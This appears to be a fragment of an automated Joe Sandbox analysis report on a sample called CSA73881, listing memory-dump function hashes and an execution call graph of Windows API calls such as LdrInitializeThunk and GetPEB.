                      • Instruction ID: 2a4c8ca91f0b4d5e31e6eda98caf7b5256c577802e02d566aeaff0fb316c1e57
                      • Opcode Fuzzy Hash: ab616933dc8c71182f335e48e4836cbda84c184410c019998ce838b84d2a9389
                      • Instruction Fuzzy Hash: B6E06D309043889BCF10DBB5D0445DDBFB0AB42218F1446DED0959B792DB34150ADB41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d4997be10436ebb277ebb4d05135dde809f02c02f00e08392606761095fe02a0
                      • Instruction ID: 407087f460675adfbb334ebe00d0323f16659dfc125df8b8ecb54d2e14acaeaa
                      • Opcode Fuzzy Hash: d4997be10436ebb277ebb4d05135dde809f02c02f00e08392606761095fe02a0
                      • Instruction Fuzzy Hash: DCE086311041946BD341CB98D8019A67F6CE786120F14C45FFC4487203CA619912D790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: afc513a445770f71d3aec0165b71307310667a88ea8f55c6dc09b7537e7d1ee1
                      • Instruction ID: 6b7f35c10fb1213438b6bd91db11688caababcea8afab405d433c51d49fcfe5f
                      • Opcode Fuzzy Hash: afc513a445770f71d3aec0165b71307310667a88ea8f55c6dc09b7537e7d1ee1
                      • Instruction Fuzzy Hash: EFD097332646480BD28063B8F0063EF778D8BC022AF04802AE00CCA602CF0881C9A2F1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 39daae4ec6ad2d6f13cc936e8c959f5d2d01cdd1b4f5a91f03a477d6b9b7a33b
                      • Instruction ID: d619f60306fd53115dc8326a27d1a08de6032159c01130fe338510d52ad89075
                      • Opcode Fuzzy Hash: 39daae4ec6ad2d6f13cc936e8c959f5d2d01cdd1b4f5a91f03a477d6b9b7a33b
                      • Instruction Fuzzy Hash: F1E0867690658CA6C711EBF08D0069FBBB8DB06510F5005EAE40D8B912E9394B14A792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02893d0bbf66c9b6ed7596b1d75b20072a85d97736cc3f2e250a08de966d3c1f
                      • Instruction ID: 99123baa0e4de9a96fd11741487edc11c2b08c6f18a8515f7d288945740ba6e5
                      • Opcode Fuzzy Hash: 02893d0bbf66c9b6ed7596b1d75b20072a85d97736cc3f2e250a08de966d3c1f
                      • Instruction Fuzzy Hash: DAE09274E04208AF8B54EFA9E44559DBBB9AB48208F0085A9E809A7740EA746A48CF81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a05f1950528b7880f8338e354df6d965883d797605a935de1bc9bed593bed3ac
                      • Instruction ID: 5f701c2c20e2fc4fdf219b086f4327bf9cc5e4a0cce61f79dffc888ebb63cd9b
                      • Opcode Fuzzy Hash: a05f1950528b7880f8338e354df6d965883d797605a935de1bc9bed593bed3ac
                      • Instruction Fuzzy Hash: F0D05E36720118ABA6045A4DE4518EB7BAEC7C9720B548026B608C7344CEB89C0253E5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2bed5525e14feef7da1d4d2c54c673419b999748e1e4b8134aa7842e2140847f
                      • Instruction ID: e8d93f4872846c74d06d7cf4a33969cd3c2369a34b1d9e2e3446fc39ed50a949
                      • Opcode Fuzzy Hash: 2bed5525e14feef7da1d4d2c54c673419b999748e1e4b8134aa7842e2140847f
                      • Instruction Fuzzy Hash: 71D05E363001285B9644964DE4588ABB7EFDBC9631B1880A6E508CB355CEB9EC0687E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5dc241868c3f680576b8944facdeda8e623f5a5c9f21721037a2dc4ab35df21
                      • Instruction ID: fdbda0b6fd35c1fda14eab8b1d8e3d14fa1ef4beb20560bfdcf69234e1112916
                      • Opcode Fuzzy Hash: d5dc241868c3f680576b8944facdeda8e623f5a5c9f21721037a2dc4ab35df21
                      • Instruction Fuzzy Hash: 23D05E70245A4497E310C6A8D802B2AFBA9DB94A50F18C07DEC898B653CE2AAC02C691
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 149a4ad4f9b1b5984d676cccfb998f3cd0d7f4b68223f1cf7de45c66c98d69f1
                      • Instruction ID: a437344abbd4933a68b4e8ad017f69338cce9c3a7deac8346e5fdc45dd1b3fe9
                      • Opcode Fuzzy Hash: 149a4ad4f9b1b5984d676cccfb998f3cd0d7f4b68223f1cf7de45c66c98d69f1
                      • Instruction Fuzzy Hash: 97D097393086242BC32863B8681638B3FAFAF44124F5081AEFC09CE303CF24C80283A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce9ec367f6152e229ccde99f783d68386b9983f7a35296fc76c44cbdcf9b5557
                      • Instruction ID: 430d7538f828a67e9122ac2b3f55b71c41bfd3eaa8967b933cae1dfb3a968761
                      • Opcode Fuzzy Hash: ce9ec367f6152e229ccde99f783d68386b9983f7a35296fc76c44cbdcf9b5557
                      • Instruction Fuzzy Hash: A4D05EB6D0211CAB8B00EFF0DA4449E7BF8EB06100B5008E5D40D97210EE314A00A7A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.326162521.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6450000_CSA73881.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a60e264c8685d00e291f566c7ecf5e219575182009b836a72402b7379160408c
                      • Instruction ID: 87b90bacbdca673d0204ac3e84dd6ea14b8c75d74a1c9797a401261601f1c644
                      Execution Graph

                      Execution Coverage:0.6%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:50.8%
                      Total number of Nodes:1645
                      Total number of Limit Nodes:68
18336 139e5b6 17554->18336 17555 139e1cd 17555->17552 17555->17554 17556 139e2ed RtlDebugPrintTimes 17555->17556 17559 139e303 17556->17559 17558 139e401 RtlDebugPrintTimes 17558->17554 17559->17554 17559->17558 17561 138bbbb 298 API calls 17560->17561 17564 1380404 17561->17564 17562 138039a 17562->17525 17569 139e4b3 17562->17569 17563 138058b 17563->17562 17566 138bcd2 279 API calls 17563->17566 17564->17562 17564->17563 18361 1380150 17564->18361 17566->17562 17571 139e4c9 17569->17571 17570 139e5a7 17570->17525 17571->17570 17572 139e5b6 14 API calls 17571->17572 17572->17570 17574 138bceb 17573->17574 18367 138ae44 17574->18367 17578 12f4ec0 17577->17578 17580 12f4e94 17577->17580 17579 12f4ed6 RtlDebugPrintTimes 17578->17579 17584 12f4eeb 17578->17584 17579->17584 17581 130b640 _vswprintf_s 12 API calls 17580->17581 17582 12f4eac 17581->17582 17582->17538 17583 1378df1 13 API calls 17583->17580 17584->17580 17584->17583 17586 138bc04 17585->17586 17587 138bd63 17585->17587 17586->17543 17586->17544 17586->17545 17588 12f4e70 14 API calls 17587->17588 17588->17586 17590 138f9d6 17589->17590 17611 139022c 17590->17611 17592 138f9e1 17593 138f9e7 17592->17593 17595 138fa16 17592->17595 17617 13905ac 17592->17617 17593->17543 17597 138fa1a _vswprintf_s 17595->17597 17633 139070d 17595->17633 17597->17593 17647 1390a13 17597->17647 17600 138aa44 17599->17600 17606 138aa66 17600->17606 18124 138ab54 17600->18124 17601 12e7d50 GetPEB 17603 138ab0f 17601->17603 17604 138ab23 17603->17604 17605 138ab13 GetPEB 17603->17605 17607 138ab49 17604->17607 17608 138ab2d GetPEB 17604->17608 17605->17604 17606->17601 17607->17543 17608->17607 17609 138ab3c 17608->17609 18136 138131b 17609->18136 17612 1390278 17611->17612 17614 13902c2 17612->17614 17655 1390ea5 17612->17655 17616 13902e9 17614->17616 17682 131cf85 17614->17682 17616->17592 17621 13905d1 17617->17621 17618 13906db 17618->17595 17619 1390652 17620 138a854 34 API calls 17619->17620 17623 1390672 17620->17623 
17621->17618 17621->17619 17622 138a80d 28 API calls 17621->17622 17622->17619 17623->17618 17837 1391293 17623->17837 17626 12e7d50 GetPEB 17627 139069c 17626->17627 17628 13906b0 17627->17628 17629 13906a0 GetPEB 17627->17629 17628->17618 17630 13906ba GetPEB 17628->17630 17629->17628 17630->17618 17631 13906c9 17630->17631 17632 138138a 14 API calls 17631->17632 17632->17618 17634 1390734 17633->17634 17635 13907d2 17634->17635 17636 138afde 34 API calls 17634->17636 17635->17597 17637 1390782 17636->17637 17638 1391293 34 API calls 17637->17638 17639 139078e 17638->17639 17640 12e7d50 GetPEB 17639->17640 17641 1390793 17640->17641 17642 1390797 GetPEB 17641->17642 17643 13907a7 17641->17643 17642->17643 17643->17635 17644 13907b1 GetPEB 17643->17644 17644->17635 17645 13907c0 17644->17645 17841 13814fb 17645->17841 17648 1390a3c 17647->17648 17849 1390392 17648->17849 17651 131cf85 34 API calls 17653 1390aec 17651->17653 17652 1390b19 17652->17593 17653->17652 17654 1391074 36 API calls 17653->17654 17654->17652 17686 138ff69 17655->17686 17657 139105b 17659 1391055 17657->17659 17718 1391074 17657->17718 17658 1390f32 17692 138a854 17658->17692 17659->17614 17662 1390fab 17666 12e7d50 GetPEB 17662->17666 17663 1390ecb 17663->17657 17663->17658 17664 138a80d 28 API calls 17663->17664 17664->17658 17667 1390fcf 17666->17667 17669 1390fe3 17667->17669 17670 1390fd3 GetPEB 17667->17670 17668 1390f50 17668->17657 17668->17662 17700 13915b5 17668->17700 17671 1390fed GetPEB 17669->17671 17672 139100e 17669->17672 17670->17669 17671->17672 17673 1390ffc 17671->17673 17674 12e7d50 GetPEB 17672->17674 17675 138138a 14 API calls 17673->17675 17676 1391013 17674->17676 17675->17672 17677 1391027 17676->17677 17678 1391017 GetPEB 17676->17678 17679 1391041 17677->17679 17704 137fec0 17677->17704 17678->17677 17679->17659 17712 13852f8 17679->17712 17684 131cf98 17682->17684 17683 131cfb1 17683->17616 17684->17683 17685 13852f8 34 API calls 17684->17685 17685->17683 17690 
138ff9f 17686->17690 17691 138ffd1 17686->17691 17687 138a854 34 API calls 17688 138fff1 17687->17688 17688->17663 17689 138a80d 28 API calls 17689->17691 17690->17689 17690->17691 17691->17687 17693 138a8c0 17692->17693 17695 138a941 17692->17695 17693->17695 17730 138f021 17693->17730 17696 138aa00 17695->17696 17734 13853d9 17695->17734 17698 130b640 _vswprintf_s 12 API calls 17696->17698 17699 138aa10 17698->17699 17699->17668 17701 13915d7 17700->17701 17702 13915d0 17700->17702 17701->17668 17703 139165e LdrInitializeThunk 17702->17703 17703->17701 17705 137fee5 _vswprintf_s 17704->17705 17706 12e7d50 GetPEB 17705->17706 17707 137ff02 17706->17707 17708 137ff16 _vswprintf_s 17707->17708 17709 137ff06 GetPEB 17707->17709 17710 130b640 _vswprintf_s 12 API calls 17708->17710 17709->17708 17711 137ff3b 17710->17711 17711->17679 17713 1385321 17712->17713 17714 13853c7 17712->17714 17715 1347b9c 34 API calls 17713->17715 17716 130b640 _vswprintf_s 12 API calls 17714->17716 17715->17714 17717 13853d5 17716->17717 17717->17659 17719 13910b0 17718->17719 17720 1391095 17718->17720 17795 138afde 17719->17795 17721 139165e LdrInitializeThunk 17720->17721 17721->17719 17724 12e7d50 GetPEB 17725 13910cd 17724->17725 17726 13910e1 17725->17726 17727 13910d1 GetPEB 17725->17727 17728 13910fa 17726->17728 17804 137fe3f 17726->17804 17727->17726 17728->17659 17731 138f03a 17730->17731 17748 138ee22 17731->17748 17735 1385552 17734->17735 17736 13853f7 17734->17736 17737 138547c 17735->17737 17740 1347b9c 34 API calls 17735->17740 17738 13854eb 17736->17738 17739 1385403 17736->17739 17743 130b640 _vswprintf_s 12 API calls 17737->17743 17738->17737 17745 1347b9c 34 API calls 17738->17745 17741 138540b 17739->17741 17742 1385481 17739->17742 17740->17737 17741->17737 17779 1347b9c 17741->17779 17742->17737 17746 1347b9c 34 API calls 17742->17746 17744 13855bd 17743->17744 17744->17696 17745->17737 17746->17737 17749 138ee5d 17748->17749 17751 138ef09 17749->17751 17753 138ee73 
17749->17753 17750 130b640 _vswprintf_s 12 API calls 17752 138efd4 17750->17752 17758 138eef5 17751->17758 17764 138f8c5 17751->17764 17752->17695 17753->17758 17759 138f607 17753->17759 17758->17750 17762 138f626 17759->17762 17760 138eedd 17760->17758 17763 13096e0 LdrInitializeThunk 17760->17763 17762->17760 17770 139165e 17762->17770 17763->17758 17765 138f8ea 17764->17765 17766 138f932 17765->17766 17767 138f607 LdrInitializeThunk 17765->17767 17766->17758 17768 138f90f 17767->17768 17768->17766 17778 13096e0 LdrInitializeThunk 17768->17778 17772 139166a _vswprintf_s 17770->17772 17771 1391869 _vswprintf_s 17771->17762 17772->17771 17774 1391d55 17772->17774 17775 1391d61 _vswprintf_s 17774->17775 17776 1391fc5 _vswprintf_s 17775->17776 17777 13096e0 _vswprintf_s LdrInitializeThunk 17775->17777 17776->17772 17777->17776 17778->17766 17782 1301130 17779->17782 17785 130115f 17782->17785 17786 133cd96 17785->17786 17787 13011a8 17785->17787 17787->17786 17788 133cd9d 17787->17788 17792 13011e9 _vswprintf_s 17787->17792 17790 1395ba5 34 API calls 17788->17790 17794 13012bd 17788->17794 17789 130b640 _vswprintf_s 12 API calls 17791 1301159 17789->17791 17790->17794 17791->17737 17793 12cccc0 _vswprintf_s 12 API calls 17792->17793 17792->17794 17793->17794 17794->17786 17794->17789 17796 138b039 17795->17796 17797 138b00a 17795->17797 17802 138b035 17796->17802 17821 13096e0 LdrInitializeThunk 17796->17821 17797->17796 17798 138b00e 17797->17798 17800 138b026 17798->17800 17812 138f209 17798->17812 17800->17724 17802->17800 17803 13853d9 34 API calls 17802->17803 17803->17800 17805 137fe64 _vswprintf_s 17804->17805 17806 12e7d50 GetPEB 17805->17806 17807 137fe81 17806->17807 17808 137fe85 GetPEB 17807->17808 17809 137fe95 _vswprintf_s 17807->17809 17808->17809 17810 130b640 _vswprintf_s 12 API calls 17809->17810 17811 137feba 17810->17811 17811->17728 17813 138f23b 17812->17813 17814 138f27a 17813->17814 17815 138f241 17813->17815 17820 138f28f _vswprintf_s 
17814->17820 17823 13096e0 LdrInitializeThunk 17814->17823 17822 13096e0 LdrInitializeThunk 17815->17822 17819 138f26d 17819->17802 17820->17819 17824 138f7dd 17820->17824 17821->17802 17822->17819 17823->17820 17825 138f803 17824->17825 17830 138f4a1 17825->17830 17829 138f82d 17829->17819 17831 138f4bc 17830->17831 17832 139165e LdrInitializeThunk 17831->17832 17834 138f4ea 17832->17834 17833 138f51c 17836 13096e0 LdrInitializeThunk 17833->17836 17834->17833 17835 139165e LdrInitializeThunk 17834->17835 17835->17834 17836->17829 17838 1390697 17837->17838 17839 13912b2 17837->17839 17838->17626 17840 13852f8 34 API calls 17839->17840 17840->17838 17842 1381520 _vswprintf_s 17841->17842 17843 12e7d50 GetPEB 17842->17843 17844 1381543 17843->17844 17845 1381547 GetPEB 17844->17845 17846 1381557 _vswprintf_s 17844->17846 17845->17846 17847 130b640 _vswprintf_s 12 API calls 17846->17847 17848 138157c 17847->17848 17848->17635 17850 13903a0 17849->17850 17851 1390589 17850->17851 17852 139070d 37 API calls 17850->17852 17854 136da47 17850->17854 17851->17651 17852->17850 17855 136da51 17854->17855 17859 136da9b 17854->17859 17855->17859 17860 12ec4a0 17855->17860 17859->17850 17880 12ec577 17860->17880 17862 130b640 _vswprintf_s 12 API calls 17864 12ec545 17862->17864 17863 12ec4cc 17873 12ec52c 17863->17873 17888 12ec182 17863->17888 17864->17859 17874 138526e 17864->17874 17866 12ec515 17867 12ec519 17866->17867 17868 12ec565 17866->17868 17866->17873 17899 12edbe9 17867->17899 17872 1332e61 RtlDebugPrintTimes 17868->17872 17868->17873 17869 12ec4f9 17869->17866 17869->17873 17917 12ee180 17869->17917 17872->17873 17873->17862 17875 138528d 17874->17875 17876 13852a4 17874->17876 17877 1347b9c 34 API calls 17875->17877 17878 130b640 _vswprintf_s 12 API calls 17876->17878 17877->17876 17879 13852af 17878->17879 17879->17859 17881 12ec5b5 17880->17881 17882 12ec583 17880->17882 17883 12ec5ce 17881->17883 17884 12ec5bb GetPEB 17881->17884 17882->17881 17887 12ec59e 
GetPEB 17882->17887 17885 13988f5 34 API calls 17883->17885 17884->17883 17886 12ec5ad 17884->17886 17885->17886 17886->17863 17887->17881 17887->17886 17889 12ec1c4 17888->17889 17890 12ec1a2 17888->17890 17891 12e7d50 GetPEB 17889->17891 17890->17869 17892 12ec1dc 17891->17892 17893 1332d65 GetPEB 17892->17893 17894 12ec1e4 17892->17894 17895 1332d78 17893->17895 17894->17895 17897 12ec1f2 17894->17897 17938 1398d34 17895->17938 17897->17890 17920 12eb944 17897->17920 17900 12edc05 17899->17900 17910 12edc54 17900->17910 17967 12c4510 17900->17967 17901 12e7d50 GetPEB 17903 12edd10 17901->17903 17905 12edd18 17903->17905 17906 1333aff GetPEB 17903->17906 17908 1333b12 17905->17908 17909 12edd29 17905->17909 17906->17908 17907 12ccc50 34 API calls 17907->17910 17975 1398ed6 17908->17975 17959 12edd82 17909->17959 17910->17901 17912 1333b1b 17912->17912 17915 12eb944 17 API calls 17916 12edd45 17915->17916 17916->17873 17918 12ec577 36 API calls 17917->17918 17919 12ee198 17918->17919 17919->17866 17921 12ebadd 17920->17921 17925 12eb980 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17920->17925 17922 12e7d50 GetPEB 17921->17922 17934 12ebab7 17921->17934 17924 12ebaee 17922->17924 17923 130b640 _vswprintf_s 12 API calls 17926 12ebad9 17923->17926 17927 12ebaf6 17924->17927 17928 1332caf GetPEB 17924->17928 17929 12e7d50 GetPEB 17925->17929 17925->17934 17926->17890 17927->17934 17945 1398cd6 17927->17945 17930 1332cc2 GetPEB 17928->17930 17931 12ebaa1 17929->17931 17935 1332cd5 17930->17935 17931->17930 17933 12ebaa9 17931->17933 17933->17934 17933->17935 17934->17923 17952 1398f6a 17935->17952 17937 1332ce2 17937->17937 17939 12e7d50 GetPEB 17938->17939 17940 1398d5a 17939->17940 17941 1398d5e GetPEB 17940->17941 17942 1398d6e _vswprintf_s 17940->17942 17941->17942 17943 130b640 _vswprintf_s 12 API calls 17942->17943 17944 1398d91 17943->17944 17944->17890 17946 12e7d50 GetPEB 17945->17946 17947 1398cf9 17946->17947 17948 1398cfd GetPEB 17947->17948 17949 1398d0d 
_vswprintf_s 17947->17949 17948->17949 17950 130b640 _vswprintf_s 12 API calls 17949->17950 17951 1398d30 17950->17951 17951->17934 17953 12e7d50 GetPEB 17952->17953 17954 1398f9c 17953->17954 17955 1398fa0 GetPEB 17954->17955 17956 1398fb0 _vswprintf_s 17954->17956 17955->17956 17957 130b640 _vswprintf_s 12 API calls 17956->17957 17958 1398fd3 17957->17958 17958->17937 17960 12eddbc 17959->17960 17961 12deef0 27 API calls 17960->17961 17962 12edeee 17960->17962 17965 12edd3b 17960->17965 17961->17960 17963 12deb70 34 API calls 17962->17963 17964 12edf0b 17963->17964 17964->17965 17982 12edf70 17964->17982 17965->17915 17968 12c4523 17967->17968 17969 12c458f 17967->17969 17968->17969 17970 12cb150 _vswprintf_s 12 API calls 17968->17970 17969->17907 17971 13208f7 17970->17971 17972 12cb150 _vswprintf_s 12 API calls 17971->17972 17973 1320901 17972->17973 17974 12cb150 _vswprintf_s 12 API calls 17973->17974 17974->17969 17976 12e7d50 GetPEB 17975->17976 17977 1398f2f 17976->17977 17978 1398f33 GetPEB 17977->17978 17979 1398f43 _vswprintf_s 17977->17979 17978->17979 17980 130b640 _vswprintf_s 12 API calls 17979->17980 17981 1398f66 17980->17981 17981->17912 17983 12edf7c _vswprintf_s 17982->17983 17985 12edfba 17983->17985 17986 12edfe5 17983->17986 18003 12edfbf 17983->18003 18004 12de510 17985->18004 17988 12ee07c 17986->17988 17989 12edff2 17986->17989 17987 12edfdf _vswprintf_s 17987->17965 18101 12ff8f2 17988->18101 17991 12edffb 17989->17991 17992 12ee075 17989->17992 18032 12f0075 17991->18032 18087 12f36e9 17992->18087 17996 12ee000 17997 12ee01e 17996->17997 17998 1333b30 17996->17998 17996->18003 17997->18003 18060 12cb1e1 17997->18060 18116 1345510 17998->18116 18023 12ee090 18003->18023 18005 12db02a 20 API calls 18004->18005 18020 12de57e 18005->18020 18006 12de8b4 18008 12d8794 69 API calls 18006->18008 18022 12de8ec 18006->18022 18007 12de904 18010 12de90c 18007->18010 18013 12cb1e1 19 API calls 18007->18013 18011 12de8d0 18008->18011 18009 12de95a 
18009->18003 18010->18003 18014 12db02a 20 API calls 18011->18014 18011->18022 18012 13097a0 _vswprintf_s LdrInitializeThunk 18012->18007 18015 132b98c 18013->18015 18014->18022 18016 132b7e9 18017 1345510 12 API calls 18016->18017 18016->18022 18017->18022 18018 12de783 18019 1345510 12 API calls 18018->18019 18018->18022 18019->18022 18020->18006 18020->18009 18020->18016 18020->18018 18021 131cdfa 12 API calls 18020->18021 18020->18022 18021->18020 18022->18007 18022->18012 18024 1333b90 18023->18024 18026 12ee099 18023->18026 18025 12cb1e1 19 API calls 18024->18025 18027 1333ba6 18025->18027 18028 12deef0 27 API calls 18026->18028 18031 12ee0e1 18026->18031 18027->18027 18029 12ee0bc 18028->18029 18030 12deb70 34 API calls 18029->18030 18030->18031 18031->17987 18033 12f00d9 18032->18033 18042 12f00ea _vswprintf_s 18032->18042 18034 12ec07f 20 API calls 18033->18034 18033->18042 18034->18042 18035 12efda0 104 API calls 18035->18042 18036 12f0223 18038 12f022f 18036->18038 18039 12f02ba 18036->18039 18037 12da8c0 14 API calls 18037->18042 18040 12f002d 6 API calls 18038->18040 18041 12ff99e 66 API calls 18039->18041 18043 12f0234 18040->18043 18051 12f023c 18041->18051 18042->18035 18042->18036 18042->18037 18044 12f02f3 55 API calls 18042->18044 18045 12f02d6 GetPEB 18042->18045 18046 12cad30 GetPEB 18042->18046 18050 12f03e2 248 API calls 18042->18050 18047 1346dc9 63 API calls 18043->18047 18043->18051 18044->18042 18045->18042 18046->18042 18047->18051 18048 1334c11 18052 12cad30 GetPEB 18048->18052 18049 12f024a 18053 12f02d6 GetPEB 18049->18053 18050->18042 18051->18048 18051->18049 18054 1334c1a 18052->18054 18055 12f026a 18053->18055 18054->18054 18056 12f0274 18055->18056 18057 12fb390 GetPEB 18055->18057 18058 130b640 _vswprintf_s 12 API calls 18056->18058 18057->18056 18059 12f0287 18058->18059 18059->17996 18061 12e7d50 GetPEB 18060->18061 18062 12cb1f1 18061->18062 18063 12cb1f9 18062->18063 18064 1324a0e GetPEB 18062->18064 18065 1324a21 GetPEB 
18063->18065 18066 12cb207 18063->18066 18064->18065 18065->18066 18067 1324a34 18065->18067 18073 12caa16 18066->18073 18068 12e7d50 GetPEB 18067->18068 18069 1324a39 18068->18069 18070 1324a4d 18069->18070 18071 1324a3d GetPEB 18069->18071 18070->18066 18072 1347016 16 API calls 18070->18072 18071->18070 18072->18066 18074 1324458 GetPEB 18073->18074 18075 12caa42 18073->18075 18078 12caa52 _vswprintf_s 18074->18078 18075->18074 18075->18078 18076 12caa64 18077 130b640 _vswprintf_s 12 API calls 18076->18077 18079 12caa71 18077->18079 18078->18076 18080 12f5e50 52 API calls 18078->18080 18079->18003 18081 13244ad 18080->18081 18082 13244e6 18081->18082 18084 12fb230 34 API calls 18081->18084 18082->18076 18083 13244ee GetPEB 18082->18083 18083->18076 18085 13244db 18084->18085 18086 12cf7a0 36 API calls 18085->18086 18086->18082 18088 12d6a3a 54 API calls 18087->18088 18089 12f3743 18088->18089 18090 12f3792 18089->18090 18091 12f02f3 55 API calls 18089->18091 18094 12f03e2 248 API calls 18090->18094 18100 12f37a5 18090->18100 18093 12f3760 18091->18093 18092 12f37b9 18095 130b640 _vswprintf_s 12 API calls 18092->18095 18093->18090 18098 12f37d0 18093->18098 18094->18100 18097 12f37cc 18095->18097 18096 12cad30 GetPEB 18096->18092 18097->17996 18099 12ff99e 66 API calls 18098->18099 18099->18100 18100->18092 18100->18096 18102 12ff948 18101->18102 18103 12ff97e 18102->18103 18104 12ff952 18102->18104 18105 12d6b6b 53 API calls 18103->18105 18106 12ff99e 66 API calls 18104->18106 18107 12ff989 18105->18107 18113 12ff959 18106->18113 18110 12f03e2 248 API calls 18107->18110 18107->18113 18108 12ff967 18112 130b640 _vswprintf_s 12 API calls 18108->18112 18109 133bdad 18111 12cad30 GetPEB 18109->18111 18110->18113 18114 133bdb6 18111->18114 18115 12ff97a 18112->18115 18113->18108 18113->18109 18114->18114 18115->17996 18117 1345543 18116->18117 18118 1345612 18117->18118 18121 1345767 12 API calls 18117->18121 18119 130b640 _vswprintf_s 12 API calls 18118->18119 18120 
134561f 18119->18120 18120->18003 18122 13455f6 18121->18122 18123 12cb171 _vswprintf_s 12 API calls 18122->18123 18123->18118 18125 138ab88 18124->18125 18126 138ab79 18124->18126 18127 138abb1 18125->18127 18128 138aba4 18125->18128 18133 138ab8f 18125->18133 18143 138cac9 18126->18143 18131 138abc1 18127->18131 18132 138abb6 18127->18132 18149 13928ec 18128->18149 18158 138e539 18131->18158 18134 138f9a1 271 API calls 18132->18134 18133->17606 18134->18133 18137 12e7d50 GetPEB 18136->18137 18138 138134d 18137->18138 18139 1381351 GetPEB 18138->18139 18140 1381361 _vswprintf_s 18138->18140 18139->18140 18141 130b640 _vswprintf_s 12 API calls 18140->18141 18142 1381384 18141->18142 18142->17607 18144 138cadd 18143->18144 18147 138cafc 18144->18147 18179 138c8f7 18144->18179 18148 138cb00 _vswprintf_s 18147->18148 18183 138d12f 18147->18183 18148->18125 18156 1392908 18149->18156 18151 13929f5 18152 1392a8c 18151->18152 18153 1392a60 18151->18153 18307 13925dd 18152->18307 18155 138a80d 28 API calls 18153->18155 18157 1392a70 _vswprintf_s 18155->18157 18156->18151 18156->18157 18298 1393149 18156->18298 18157->18133 18159 138bbbb 297 API calls 18158->18159 18167 138e567 18159->18167 18160 138e635 18161 138e804 18160->18161 18163 138afde 34 API calls 18160->18163 18161->18133 18162 138e618 18162->18160 18166 138bcd2 279 API calls 18162->18166 18163->18161 18164 138e5f6 18165 138a854 34 API calls 18164->18165 18171 138e614 18165->18171 18166->18160 18167->18160 18167->18162 18167->18164 18168 138a80d 28 API calls 18167->18168 18168->18164 18169 138e68f 18170 138a854 34 API calls 18169->18170 18173 138e6ae 18170->18173 18171->18162 18171->18169 18172 138a80d 28 API calls 18171->18172 18172->18169 18173->18162 18174 12e7d50 GetPEB 18173->18174 18175 138e7a8 18174->18175 18176 138e7ac GetPEB 18175->18176 18177 138e7c0 18175->18177 18176->18177 18177->18161 18178 137fec0 14 API calls 18177->18178 18178->18162 18180 138c94b 18179->18180 18181 138c915 18179->18181 
